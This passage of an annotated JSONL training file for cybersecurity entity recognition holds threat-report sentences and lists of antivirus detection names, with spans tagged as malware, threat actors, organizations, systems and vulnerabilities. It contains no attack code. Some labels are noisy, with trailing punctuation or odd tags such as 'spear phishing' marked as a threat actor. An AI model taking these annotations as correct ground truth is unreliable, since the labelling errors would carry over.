Win32.Trojan.Falsesign.Agbe MSIL/Injector.ONL!tr Win32/Trojan.Dropper.28b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001533", "source": "cyner2_train"}} {"text": "A backdoor also known as: PowerShell/Rozena.AF BehavesLike.Win64.Dropper.cc Trojan/Scar.bmid", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001534", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.RSM.2.0 Backdoor/W32.RSM.204800 Backdoor.RSM Backdoor.RSM.2.0 Backdoor.RSM.2.0 Backdoor.Trojan Backdoor.RSM.2.0 Backdoor.Win32.RSM.20 Backdoor.RSM.2.0 Trojan.Win32.RSM.dmmg Backdoor.Win32.Z.Rsm.204800 Backdoor.W32.RSM.20!c Backdoor.RSM.2.0 Backdoor.RSM.2.0 BackDoor.RMS.20 Backdoor.RSM.Win32.4 BehavesLike.Win32.Dropper.dc Backdoor.Win32.Intruder W32/Risk.WUUC-5425 Backdoor/RSM.28.b BDS/RSM.20.2 Backdoor:Win32/RSM.2_0 Backdoor.Win32.RSM.20 Backdoor.RSM Win32/RSM.20 Win32.Backdoor.Rsm.Sysb Backdoor.RSM!gcfh+QxIfXE W32/RSM.20!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001535", "source": "cyner2_train"}} {"text": "Security researchers have discovered that Cl0p is now targeting Linux systems, using a new variant specifically designed for this operating system.", "spans": {"ORGANIZATION: Security researchers": [[0, 20]], "MALWARE: Cl0p": [[42, 46]], "SYSTEM: Linux systems,": [[64, 78]], "MALWARE: new variant": [[87, 98]], "SYSTEM: operating system.": [[130, 147]]}, "info": {"id": "cyner2_train_001536", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9951 Worm.BAT.Autorun.ex TrojWare.Win32.StartPage.~AO Win32.HLLW.Autoruner2.11336 Worm.AutoRun.Win32.42154 BehavesLike.Win32.Virus.cz Trojan-Dropper.Win32.Autorun Worm.BAT.al Win32.HeurC.KVM007.a.kcloud Worm.BAT.Autorun.ex TrojanDropper:Win32/Autorun.AC Worm/Win32.AutoRun.R74164 TScope.Trojan.Delf Trj/CI.A BAT/Autorun.BK Bat.Worm.Autorun.Aihw BAT/Autorun.EX!worm", "spans": {"MALWARE: backdoor": [[2, 
10]]}, "info": {"id": "cyner2_train_001537", "source": "cyner2_train"}} {"text": "Nonetheless, we can obtain targeting information and insight into tactics from the spearphish messages used by the threat actors.", "spans": {"THREAT_ACTOR: threat actors.": [[115, 129]]}, "info": {"id": "cyner2_train_001539", "source": "cyner2_train"}} {"text": "A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team and eventually download PoisonIvy and other payloads in user systems.", "spans": {"THREAT_ACTOR: campaign": [[9, 17]], "VULNERABILITY: Flash exploits": [[68, 82]], "ORGANIZATION: Hacking Team": [[94, 106]], "MALWARE: PoisonIvy": [[131, 140]], "MALWARE: payloads": [[151, 159]], "SYSTEM: user systems.": [[163, 176]]}, "info": {"id": "cyner2_train_001542", "source": "cyner2_train"}} {"text": "This trojanized version of PuTTY harvests credentials and relays the information back to a collection server in the same way too.", "spans": {"MALWARE: trojanized version of PuTTY": [[5, 32]]}, "info": {"id": "cyner2_train_001543", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SysAntiH.Worm Worm.Win32.AutoRun!O Worm.Yeltminky.A2 Win32.Trojan.KillAV.y W32.SillyFDC Win32/SillyAutorun.BBA Trojan.Win32.AntiAV.ciuz Trojan.Win32.AutoRun.btmkp Worm.Win32.Autorun.70144.E Trojan.Win32.KillAV.tco Win32.HLLW.Autoruner.25125 BehavesLike.Win32.Backdoor.lc Trojan-PWS.Win32.Lmir Worm/AutoRun.inq Virus/Win32.Virut.ce Worm:Win32/Yeltminky.A Trojan.Win32.AntiAV.ciuz Trojan/Win32.Hupigon.C73726 MalwareScope.Trojan-PSW.Game.7 RiskWare.Tool.CK Worm.AutoRun!snJYP2M4Pvg W32/QQPass.BTC Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001545", "source": "cyner2_train"}} {"text": "Ransomware has been responsible for many millions of dollars in damages, and CryptoWall is one of the most lucrative ransomware families in use today.", "spans": {"MALWARE: Ransomware": [[0, 10]], "MALWARE: CryptoWall": 
[[77, 87]], "MALWARE: ransomware families": [[117, 136]]}, "info": {"id": "cyner2_train_001548", "source": "cyner2_train"}} {"text": "In March 2017, FireEye observed both nation state and financially motivated actors using EPS zero day exploits assigned as CVE-2017-0261 and CVE-2017-0262, prior to Microsoft disabling EPS rendering in its Office products with an update in April 2017.", "spans": {"ORGANIZATION: FireEye": [[15, 22]], "THREAT_ACTOR: nation state": [[37, 49]], "THREAT_ACTOR: financially motivated actors": [[54, 82]], "SYSTEM: EPS": [[89, 92], [185, 188]], "VULNERABILITY: zero day exploits": [[93, 110]], "ORGANIZATION: Microsoft": [[165, 174]], "SYSTEM: Office products": [[206, 221]]}, "info": {"id": "cyner2_train_001551", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Coantor.11 Win.Trojan.Cuegoe-6336261-0 BehavesLike.Win32.Dropper.vc Trojan:Win32/Salgorea.C!dha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001552", "source": "cyner2_train"}} {"text": "In a story which reminds us of the Bangladesh Bank case – the culprits had compromised the bank's system connected to the SWIFT network and used this to perform the transfers.", "spans": {"ORGANIZATION: the Bangladesh Bank": [[31, 50]], "THREAT_ACTOR: culprits": [[62, 70]], "SYSTEM: the bank's system": [[87, 104]], "SYSTEM: the SWIFT network": [[118, 135]]}, "info": {"id": "cyner2_train_001554", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clodcaf.Trojan.0256 Worm/W32.Opanki.176640 W32.Allim W32/Funmov.a Win32.Trojan.WisdomEyes.151026.9950.9984 W32.Allim Win32/Opanki.R WORM_OPANKI.Q Backdoor.Win32.Aimbot.d Trojan.Win32.Aimbot.fujn Win32.Backdoor.Aimbot.Syse Worm.Win32.Opanki.R BackDoor.Oscar Worm.Opanki.Win32.38 WORM_OPANKI.Q BehavesLike.Win32.Sdbot.cc W32/Risk.ZUMS-8015 I-Worm/Opanki.b W32/Opanki.A1D5!worm Trojan[Backdoor]/Win32.Aimbot Backdoor.W32.Aimbot.d!c Win32/Funmov.worm.176640 Worm:Win32/Funmov.A Win32/Trykid.Y 
W32/Opanki.worm W32.Allim Bck/Sdbot.JED.worm Worm.Funmov!UUJQui2L6no Backdoor.Win32.Aimbot Worm/Opanki.N Backdoor.Win32.Aimbot.aLdg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001556", "source": "cyner2_train"}} {"text": "During the past few weeks, we have received information about a new campaign of targeted ransomware attacks.", "spans": {"THREAT_ACTOR: campaign": [[68, 76]]}, "info": {"id": "cyner2_train_001557", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoA.DAEE W32.Virut.G W32.Virut.CF Trojan.Win32.Crypt.dzf Virus.Win32.Virut.CE BehavesLike.Win32.BadFile.pt W32/Trojan.UBPC-4784 Trojan.Crypt.cm Trojan/Win32.Crypt TrojanDownloader:Win32/Dothemt.A Trojan.Win32.Crypt.dzf Trojan.Crypt W32/Sality.AO Win32/Virut.NBP Virus.Win32.Virut.ug W32/Virut.CE Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001558", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9962 Trojan.Win32.Graftor.dcgcrd TrojWare.Win32.Kryptik.~NT Trojan-Downloader.Win32.Banload Trojan:Win32/BrobanAda.A TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001562", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.BadApp!O TrojanDownloader.Small.AGT4 PWS-Mmorpg.e TSPY_RUNAE.SM Infostealer.Gampass Win32/AdClicker.DZX Win.Trojan.Toopu-1 Trojan.Win32.Dwn.bxzwi Backdoor.Win32.A.Rbot.65536 TrojWare.Win32.TrojanDownloader.Nirava.~clj Trojan.DownLoader1.38650 Adware.FloodAd.Win32.2 PWS-Mmorpg.e Trojan/Win32.Unknown Win32.Troj.Undef.kcloud TrojanClicker:Win32/Runae.A Trojan/Win32.OnlineGameHack.R1804 Adware.FloodAd Win32/Adware.FloodAd.AA Trojan.Win32.Clicker.sa W32/FLOODAD.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001566", "source": "cyner2_train"}} {"text": "These have been highly active in the Middle East region and unveiled ongoing 
targeted attacks in multiple regions.", "spans": {}, "info": {"id": "cyner2_train_001567", "source": "cyner2_train"}} {"text": "One of Strider's targets had also previously been infected by Regin.", "spans": {"MALWARE: Strider's": [[7, 16]], "MALWARE: Regin.": [[62, 68]]}, "info": {"id": "cyner2_train_001568", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dyname TROJ_WOONIKY.B TROJ_WOONIKY.B W32/Trojan.TZVR-6635 TR/Kazy.196035.1 Trojan.MSIL.Krypt.2 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001569", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.KowinPC.Worm Win32.Trojan.WisdomEyes.16070401.9500.9820 W32.Kaxela.A Win32/Pipown.KJ Win.Worm.Autorun-2398 Worm.Win32.AutoRun.zt Trojan.Win32.ARSleep.gcbz W32.W.AutoRun.yo!c TrojWare.Win32.Magania.~L Trojan.Popwin.651 Worm.AutoRun.Win32.11126 BehavesLike.Win32.Dropper.lc Trojan/DiskAutorun.px BDS/Exaal.45056 Worm/Win32.AutoRun Win32.Troj.OnlineGames.w.kcloud Trojan.Win32.Autorun.21043 Worm.Win32.AutoRun.zt Trojan:Win32/Malamiko.A Worm.AutoRun Trojan/Win32.lssj.2cc.rgrk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001572", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.SdBoter.28496 I-Worm.SdBoter.r2 Worm.SdBoter!97XSxLq3xLE W32/Sdbot.GFWC-1787 Win32/SdBoter.J WORM_SDBOTER.J Worm.W32.SdBoter.J Net-Worm.Win32.SdBoter.j Trojan.Win32.SdBoter.oxfz W32.W.SdBoter.j!c Win32.Worm-net.Sdboter.Star Worm.Win32.SdBoter.J BackDoor.IRC.Sdbot Worm.SdBoter.Win32.7 WORM_SDBOTER.J BehavesLike.Win32.Worm.mc W32/Sdbot.DMQ WORM/NetBot.A.2 W32/KWBOT.H Worm[Net]/Win32.SdBoter Win32/IRCBot.worm.28496 Worm:Win32/Sdboter.J W32/Sdbot.XT.worm Net-Worm.Win32.SdBoter.I IRC/BackDoor.SdBot.24.AC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001573", "source": "cyner2_train"}} {"text": "During our investigation we found several backdoors that the HDRoot bootkit used for infecting operating 
systems.", "spans": {"MALWARE: backdoors": [[42, 51]], "MALWARE: HDRoot bootkit": [[61, 75]], "SYSTEM: operating systems.": [[95, 113]]}, "info": {"id": "cyner2_train_001574", "source": "cyner2_train"}} {"text": "One of the top targets is the Japan Pension Service, but the list of targeted industries includes government and government agencies, local governments, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation and so on.", "spans": {"ORGANIZATION: Japan Pension Service,": [[30, 52]], "ORGANIZATION: industries": [[78, 88]], "ORGANIZATION: government": [[98, 108]], "ORGANIZATION: government agencies, local governments, public interest groups, universities, banks, financial services, energy, communication, heavy industry, chemical, automotive, electrical, news media, information services sector, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation": [[113, 428]]}, "info": {"id": "cyner2_train_001576", "source": "cyner2_train"}} {"text": "A backdoor also known as: Email-Flooder.Win32.DaMailer!O Win32.Trojan.WisdomEyes.16070401.9500.9998 Win.Trojan.Damailer-4 Email-Flooder.Win32.DaMailer.119 TrojWare.Win32.Flooder.DarkMail Flooder.Damail Tool.DaMailer.Win32.2 BehavesLike.Win32.BadFile.th Email-Flooder.DaMailer.d Email-Flooder.Win32.DaMailer.119 Trojan/Win32.HDC.C123509 EmailFlooder.DaMailer Trj/CI.A Win32/Flooder.DarkMail Win32.Trojan.Damailer.Htwm Flooder.DaMailer!LiHdaVOdIDQ Email-Flooder.Win32.DaMailer", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001579", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/Hamer.B!utility Trojan-Dropper/W32.Hamer_Packed.700928 Dropper.Hamer.Win32.41 Trojan/Dropper.Hamer.20 Trojan.DR.Hammer!WTBuq6wvib0 W32/Hamer.B@tool 
Backdoor.Beasty.Family Win32/TrojanDropper.Hamer.20 TROJ_HAMER.R Trojan.Downloader.Small-12 Trojan-Dropper.Win32.Hamer.20 Trojan.Win32.Hamer.dztpdb Dropper.A.Hamer.700928[h] Troj.Dropper.W32.Hamer.20!c TrojWare.Win32.TrojanDropper.Hamer.20 Trojan.DownLoader.225 Backdoor.Beasty.Family TROJ_HAMER.R BehavesLike.Win32.Dropper.jc W32/Hamer.PMZI-8206 TrojanDropper.Hammer.20 TR/Drop.Hamer.20 W32/Hamer.20!tr Trojan[Dropper]/Win32.Hamer Dropper/Hamer.700928 Backdoor.Beasty.Family TrojanDropper.Hamer Trojan.Win32.Dropper.20 Win32.Trojan-dropper.Hamer.Pkra Trojan-Dropper.Win32.Delf Dropper.Hamer.B Win32/Trojan.ece", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001580", "source": "cyner2_train"}} {"text": "We covered this attack in detail in our blog titled Shamoon 2: Return of the Disttrack Wiper, which targeted a single organization in Saudi Arabia and was set to wipe systems on November 17, 2016.", "spans": {"MALWARE: Shamoon": [[52, 59]], "MALWARE: Disttrack Wiper,": [[77, 93]], "ORGANIZATION: single organization": [[111, 130]]}, "info": {"id": "cyner2_train_001585", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Zombam!O Win32.Backdoor.Zombam.b W32/Zombam.BWLR-3283 Backdoor.Zombam.B Win.Trojan.Small-4082 Backdoor.Win32.Zombam.m Trojan.Win32.Zombam.mpym Backdoor.Win32.Zombam.M BackDoor.Httprat.2 Backdoor.Zombam.Win32.32 BehavesLike.Win32.Rontokbro.nc Backdoor.Win32.Zombam.m W32/Zombam.N@bd Backdoor/Zombam.m BDS/Zombam.L.1 Trojan[Backdoor]/Win32.Zombam Backdoor:Win32/Zombam.L Backdoor.Win32.Zombam.31444 Backdoor.Win32.Zombam.m Backdoor.Zombam Win32/Zombam.M Backdoor.Zombam!rqjS+1zkQfU W32/Zombam.M!tr.bdr Win32/Backdoor.009", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001586", "source": "cyner2_train"}} {"text": "In this case, though, running the troubleshooter leads to the installation of LatentBot, a well-documented modular bot used for surveillance, information stealing, and remote 
access.", "spans": {"SYSTEM: troubleshooter": [[34, 48]], "MALWARE: LatentBot,": [[78, 88]], "MALWARE: bot": [[115, 118]]}, "info": {"id": "cyner2_train_001588", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9705 Trojan.Win32.SchoolBoy.bhk Troj.Banker.W32.Qadars.mtwx Win32.Trojan.Schoolboy.Hvtb Trojan.MulDrop4.3547 BehavesLike.Win32.RAHack.nc Trojan.Heur.GM.D439A5C Trojan.Win32.SchoolBoy.bhk Trojan.Win32.PSW W32/SchoolBoy.BHK!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001589", "source": "cyner2_train"}} {"text": "Bookworm's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42.", "spans": {"MALWARE: Bookworm's": [[0, 10]], "MALWARE: PlugX": [[55, 60]], "SYSTEM: architecture": [[93, 105]], "ORGANIZATION: Unit 42.": [[144, 152]]}, "info": {"id": "cyner2_train_001590", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9973 Backdoor.Truebot Win.Trojan.Silence-6367671-0 W32/Trojan.JFGA-0175 Backdoor:Win32/Truebot.A Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001591", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Antilam.gzgw Backdoor.Trojan Antilam.FE BKDR_ANTILAM.A Backdoor.Win32.Antilam.20.b Backdoor.Antilam!vJ4jD43D2/o NORMAL:Trojan.SERVER_3!27802 Backdoor.Win32.Antilam.dfer BackDoor.AntiLame.23 BKDR_ANTILAM.A BehavesLike.Win32.Backdoor.cc W32/Risk.BTKH-4955 Backdoor/Antilam.20.ao BDS/Antilam.20.C Trojan[Backdoor]/Win32.Antilam Backdoor:Win32/Antilam.20.B Trojan/Win32.Xema Backdoor.AntiLamer Win32/Antilam.20.B Backdoor.Win32.Antilam W32/Antilam.B!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001592", "source": "cyner2_train"}} {"text": "FortiGuard Labs decided to analyze some of them, and in this report, I will discuss its 
evolution over the past 10 months.", "spans": {"ORGANIZATION: FortiGuard Labs": [[0, 15]]}, "info": {"id": "cyner2_train_001594", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Exploit.ShellCode.a Trojan.Mdropper.C TROJ_SAMSA.H Trojan-Dropper.MSWord.1Table.ai Exploit.OleMacroPrj.CVE-2003-0347.cezzve DOC.Z.CVE-2003-0347.75864 Win32.Trojan-Dropper.1table.swy BackDoor.Mask TROJ_SAMSA.H Troj.Dropper.Msword!c Trojan-Dropper.MSWord.1Table.ai Trojan-Dropper.MSWord.1Table.ai possible-Threat.Embedded.ExeInOffice", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001595", "source": "cyner2_train"}} {"text": "The cyberattacks against the Ukrainian electric power industry continue.", "spans": {"ORGANIZATION: the Ukrainian electric power industry": [[25, 62]]}, "info": {"id": "cyner2_train_001597", "source": "cyner2_train"}} {"text": "Researchers from the IBM X-Force Incident Response and Intelligence Services IRIS team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations.", "spans": {"ORGANIZATION: Researchers": [[0, 11]], "ORGANIZATION: IBM X-Force Incident Response": [[21, 50]], "ORGANIZATION: Intelligence Services IRIS team": [[55, 86]], "THREAT_ACTOR: a threat actor": [[134, 148]], "MALWARE: Shamoon malware": [[168, 183]], "ORGANIZATION: organizations.": [[211, 225]]}, "info": {"id": "cyner2_train_001598", "source": "cyner2_train"}} {"text": "We recently noted the non-linear growth of ransomware variants and now a new type has emerged, dubbed MarsJoke.", "spans": {"MALWARE: ransomware variants": [[43, 62]], "MALWARE: MarsJoke.": [[102, 111]]}, "info": {"id": "cyner2_train_001600", "source": "cyner2_train"}} {"text": "It has a very low volume in this two-year period, totaling roughly 27 total samples.", "spans": {"MALWARE: samples.": [[76, 84]]}, "info": {"id": "cyner2_train_001602", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan.Win32.Scar!O Trojan.Scar Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win32.Scar.bwre Trojan.Win32.VB.etyztu Trojan.Win32.Z.Scar.3042496 Troj.Downloader.W32.VB.l4ji Trojan.DownLoader25.47210 Trojan.Scar.Win32.27021 BehavesLike.Win32.Autorun.vm Trojan.Heur.VB.EDB7EC Trojan.Win32.Scar.bwre Worm:Win32/Sowndegg.B Trojan/Win32.VB.C16539 Trojan.Scar Trj/CI.A Win32/VB.SNU Win32.Trojan.Scar.Pgcp Trojan.Scar!yxP8tXFqxTQ Trojan-Downloader.Win32.VB W32/VB.SNU!tr Win32/Trojan.1c6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001603", "source": "cyner2_train"}} {"text": "The objective of this blog is to highlight some of the capabilities of this new RAT family and the impact seen so far.", "spans": {"MALWARE: RAT family": [[80, 90]]}, "info": {"id": "cyner2_train_001604", "source": "cyner2_train"}} {"text": "Since mid-2014, the Kudelski Security Cyber Fusion Center has been monitoring and investigating Sphinx Moth.", "spans": {"ORGANIZATION: Kudelski Security Cyber Fusion Center": [[20, 57]], "THREAT_ACTOR: Sphinx Moth.": [[96, 108]]}, "info": {"id": "cyner2_train_001606", "source": "cyner2_train"}} {"text": "Espionage and Asymmetric Operation Targeting", "spans": {"THREAT_ACTOR: Espionage": [[0, 9]], "THREAT_ACTOR: Asymmetric Operation Targeting": [[14, 44]]}, "info": {"id": "cyner2_train_001608", "source": "cyner2_train"}} {"text": "SWC campaign impacted global aerospace, government, and technology organizations Uses .via extension", "spans": {"THREAT_ACTOR: SWC campaign": [[0, 12]], "ORGANIZATION: global aerospace, government,": [[22, 51]], "ORGANIZATION: technology organizations": [[56, 80]]}, "info": {"id": "cyner2_train_001609", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.17AD Trojan/W32.KRDDoS.950784 TROJ_DIDKR.A Win32.Trojan.WisdomEyes.16070401.9500.9770 Downloader.Castov TROJ_DIDKR.A Trojan.DownLoader9.34810 trojan.win32.miuref.c BehavesLike.Win32.Miuref.dc Trojan.Spy TR/Spy.950784.12 
W32/KRDNSDDoS.A!tr TrojanDownloader:Win32/Simkor.A Win-Trojan/Ddkr.950784 Trj/CI.A Win32.Trojan.Spy.Hrpb", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001611", "source": "cyner2_train"}} {"text": "The Trojan named Linux.PNScan.1 can infect devices with ARM, MIPS, or PowerPC architectures.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: ARM, MIPS,": [[56, 66]], "SYSTEM: PowerPC architectures.": [[70, 92]]}, "info": {"id": "cyner2_train_001613", "source": "cyner2_train"}} {"text": "We have investigated the malware to identify how it spreads, the techniques it uses and its impact.", "spans": {}, "info": {"id": "cyner2_train_001614", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.R2D2!O Backdoor.R2d2 Backdoor.R2D2 BKDR_R2D2.SMR Backdoor.Win32.R2D2.a Trojan.Win32.R2D2.esyktw Backdoor.Win32.R2D2.360448[UPX] Backdoor.W32.R2D2!c Backdoor.Win32.R2D2.~B1 BackDoor.RTwoDTwo.1 BKDR_R2D2.SMR BehavesLike.Win32.Fake.cc Backdoor.Win32.R2D2 Backdoor/R2D2.b TR/GruenFink.1 Backdoor.Win32.R2D2.a Backdoor:Win32/R2d2.A Trj/Bundestrojaner.A Win32/R2D2.A Win32.Backdoor.R2d2.Sudy Backdoor.R2D2!w/vENfl9bd8 W32/R2D2.A!tr.bdr Win32/Trojan.fd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001616", "source": "cyner2_train"}} {"text": "The name Carbanak comes from Carberp, a banking Trojan whose source code was leaked, and Anunak, a custom Trojan that has evolved over the years.", "spans": {"MALWARE: Carbanak": [[9, 17]], "MALWARE: Carberp,": [[29, 37]], "MALWARE: banking Trojan": [[40, 54]], "MALWARE: source code": [[61, 72]], "MALWARE: Anunak,": [[89, 96]], "MALWARE: custom Trojan": [[99, 112]]}, "info": {"id": "cyner2_train_001617", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OverlayUPXDPM.PE W32.Lamer.FG8 PE_SILLY.T Win32.Virus.Lamer.f W32/SillyP2P.BO W32.SillyP2P Win32/Xolxo.A PE_SILLY.T Win.Worm.Delf-13898 Virus.Win32.Lamer.fg Trojan.Win32.Delf.oxkq Win32.BagarBubba.A 
W32.W.AutoRun.kYNN TrojWare.Win32.Pincav.AV Win32.HLLP.Bagar Worm.Delf.Win32.340 BehavesLike.Win32.Fesber.tm W32/Delf.aj W32/P2P_Worm.WULF-7526 Worm/Delf.vm Worm:Win32/Xolxo.A Virus.Win32.Lamer.fg W32/HLLP.11042 Worm.Delf Win32/Delf.NAY Virus.Win32.Lamer.fg Worm.SillyP2P!Dqe8+ZFutPA P2P-Worm.Win32.Delf.aj Virus.Win32.Viking.LG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001618", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Shutit.A Trojandownloader.Shutit Trojan.Downloader.Shutit.A Downloader.Shutit.Win32.4 Troj.Downloader.W32.Shutit.10!c Trojan/Downloader.Shutit.10 Trojan.Downloader.Shutit.A Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Risk.EKPI-0804 Win32/DlShut.A TROJ_SHUTIT.10.A Win.Trojan.Revell-1 Trojan.Downloader.Shutit.A Trojan-Downloader.Win32.Shutit.10 Trojan.Downloader.Shutit.A Trojan.Win32.Shutit.vmoy Trojan.Downloader.Shutit.A Trojan.Aphex.10 TROJ_SHUTIT.10.A BehavesLike.Win32.Downloader.zt Trojan-Downloader.Win32.Aphex TrojanDownloader.Shutit.10 TR/Shutit.10.A Trojan[Downloader]/Win32.Shutit Win32.Troj.Downloader.b.kcloud TrojanDownloader:Win32/Shutit.1_0 Trojan-Downloader.Win32.Shutit.10 TrojanDownloader.Shutit Trj/Dwn.Shutit.10 Win32/TrojanDownloader.Shutit.10 Win32.Trojan-downloader.Shutit.Ahxq Trojan.DL.Small!IxJNSrLVynM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001619", "source": "cyner2_train"}} {"text": "However, Bookworm expands on its capabilities through its ability to load additional modules directly from its command and control C2 server.", "spans": {"MALWARE: Bookworm": [[9, 17]]}, "info": {"id": "cyner2_train_001620", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FakeMS Trojan.Win32.XPACK.bdmoql WS.Reputation.1 W32/Swisyn.CB Packed.Win32.Cryptcf.A Trojan.DownLoader7.26386 Packed.Multi.dlw Win32.Hack.Packed.f.kcloud Backdoor:Win32/Racdr.A BScope.Trojan.SvcHorse.01643 Backdoor.Win32.BlackHole W32/Multi.E!tr Trj/CI.A", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001621", "source": "cyner2_train"}} {"text": "A backdoor also known as: JS:Trojan.JS.Likejack.A JS.Faceliker.NC JS/Faceliker.a JS/Faceliker.A!Eldorado JS:Trojan.JS.Likejack.A JS:Trojan.JS.Likejack.A TrojWare.JS.TrojanClicker.FbLiker.A JS:Trojan.JS.Likejack.A JS/Faceliker.a JS/Faceliker.A!Eldorado JS/FBJack.I!tr JS:Trojan.JS.Likejack.A TrojanClicker:JS/Faceliker.S Trojan-Clicker.JS.Faceliker Script.Trojan.JSClicker.A trojan.js.likejack.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001623", "source": "cyner2_train"}} {"text": "The report details how many seemingly unrelated cyber attacks may, in fact, be part of a broader offensive fueled by a shared development and logistics infrastructure — a finding that suggests some targets are facing a more organized menace than they realize.", "spans": {"SYSTEM: logistics infrastructure": [[142, 166]]}, "info": {"id": "cyner2_train_001624", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 HT_GM_GL290013.UVPM Trojan.Heur.Win32.10174 HT_GM_GL290013.UVPM BehavesLike.Win32.Trojan.vh Trojan.Heur.GM.D5FC4D76 Trojan/Win32.Buzus.R1005 Trojan.Win32.Tiggre", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001625", "source": "cyner2_train"}} {"text": "We refer to these attacks as MuddyWater due to the confusion in attributing these attacks.", "spans": {"THREAT_ACTOR: MuddyWater": [[29, 39]]}, "info": {"id": "cyner2_train_001626", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Bot Packed.Win32.Klone.bn TrojWare.Win32.VB.oks Win32.Hack.Klone.bn.kcloud Backdoor:Win32/Blohi.B Packed/Win32.Klone Backdoor.Win32.Blohi W32/VB.QIK!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001627", "source": "cyner2_train"}} {"text": "Unit 42 has collected multiple spear phishing emails, weaponized document files, 
and payloads all targeting various offices of the Mongolian government and deployed between August 2015 and February 2016.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "THREAT_ACTOR: spear phishing": [[31, 45]], "ORGANIZATION: offices of the Mongolian government": [[116, 151]]}, "info": {"id": "cyner2_train_001628", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Miancha.r5 Trojan.PR.Preshin!uX45uZVdtBM Backdoor.Readomesa Backdoor.Win32.Miancha.f Trojan.Win32.Miancha.dfftbq Trojan.Starter.3690 Backdoor.Miancha.Win32.5 Backdoor/Miancha.c TR/Cudofows.A.1 W32/Miancha.F!tr.bdr Trojan[Backdoor]/Win32.Miancha Trojan.Inject.28 Trojan:Win32/Cudofows.A Backdoor.Miancha Trj/CI.A Backdoor.Win32.Miancha Proxy.BEPF Win32/Trojan.b2e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001629", "source": "cyner2_train"}} {"text": "Recently, we came across an email exploit attempt, aimed at a European Point of Sales POS vendor.", "spans": {"MALWARE: email exploit": [[28, 